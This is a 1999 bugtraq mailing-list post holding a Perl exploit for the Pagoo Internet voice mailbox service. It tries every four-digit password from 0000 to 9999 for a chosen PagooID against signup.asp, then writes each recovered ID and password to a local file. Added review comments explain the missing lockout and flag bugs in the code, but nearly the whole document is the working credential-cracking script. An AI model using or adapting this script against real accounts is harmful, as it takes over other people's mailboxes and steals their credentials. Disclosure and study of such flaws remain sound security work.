List: bugtraq
Subject: hhp: Pagoo VMB remote exploit.
From: Elaich Of Hhp <hhp () NS ! SUSPEND ! NET>
Date: 1999-06-22 17:06:05
#!/usr/bin/perl
#
# (hhp) hhp-pagoo.pl (hhp)
# by: elaich of the hhp.
# http://hhp.hemp.net/
# '99'
#
# The (Pagoo Internet voice MailBox) exploit.
# Available at http://www.pagoo.com/
#
# This exploit will extract the password to
# the specified PagooID you specify.
#
# The vulnerability comes into play when you
# connect to your UpdateForm thru signup.asp
# which requires your PagooID and your 4
# digit password.
#
# Nothing will prevent you from reconnecting
# and trying a new password from 0000 in
# increments of 1 till we reach 9999 which
# is the highest password possible... I
# could call this a brute, but it always
# 100% of the time will get the passwd
# unlike a brute.
#
# Logs passwds to file: pagooids
use IO::Socket;
# Require exactly one command-line argument (the PagooID) and keep it in the
# global $box, which parse() later interpolates into the request URL.
die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
($box) = (@ARGV);
# Results are appended to the file "pagooids" in the current directory.
# NOTE(review): the die text names ".pagoo", which does not match the file
# that is actually opened.
open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
autoflush OUT 1;
# Hard-coded host that parse() connects to on port 80.
$host = "www.pagoo.com";
autoflush STDOUT 1;
# parse(NUM): submit one PagooID/password pair to the UpdateForm page and
# classify the reply.
#
# Every call opens a new TCP connection to $host:80, sends a single GET line
# that carries $box and NUM in the query string, and scans the response line
# by line. A line matching "First Name" is treated as a successful login: the
# pair is printed, appended to OUT, and the script exits with status 0.
# There is no explicit return value. All variables here are package globals.
#
# Defender's view: each guess is a separate request from the same client with
# a constant PagooID and a changing Password value in the URL, so the pattern
# would normally be visible in web-server access logs. The weakness is the
# one the header comment states: a four-digit secret and nothing that stops
# repeated attempts. Attempt limiting or lockout per PagooID is the missing
# control, and credentials should not travel in a GET query string.
sub parse
{
($num) = @_;
$url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";
$socket = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 80,
Proto => "tcp") or die "Can't connect.\n";
# The request line carries no HTTP version and no headers.
print $socket "GET $url\n";
print "Trying password: $num of 9999.\n";
while(<$socket>)
{
chomp;
if(/Password invalid/)
{
# NOTE(review): `break` is not a Perl loop-control statement, so presumably
# this branch has no effect and the response is still read to EOF - confirm.
break;
}
# The success test is a plain substring match on the returned page.
if(/First Name/)
{
print "PagooID password extracted...\n";
print "PagooID: $box / Password: $num\n";
print OUT "PagooID: $box / Password: $num\n";
exit 0;
}
}
}
# Drive parse() across the password space, starting from the string '0000'.
$num = '0000';
parse $num;
# $num++ on a digit-only string keeps the leading zeros ('0000' -> '0001').
# Calls are issued back to back with no delay between them; that is the
# behaviour a server-side rate limit or lockout would interrupt.
# NOTE(review): the loop body runs 10000 times after the first call, so the
# last value passed is '10000', one past the 9999 the header describes.
for($i = 0; $i <= 9999; $i++)
{
$num++;
parse $num;
}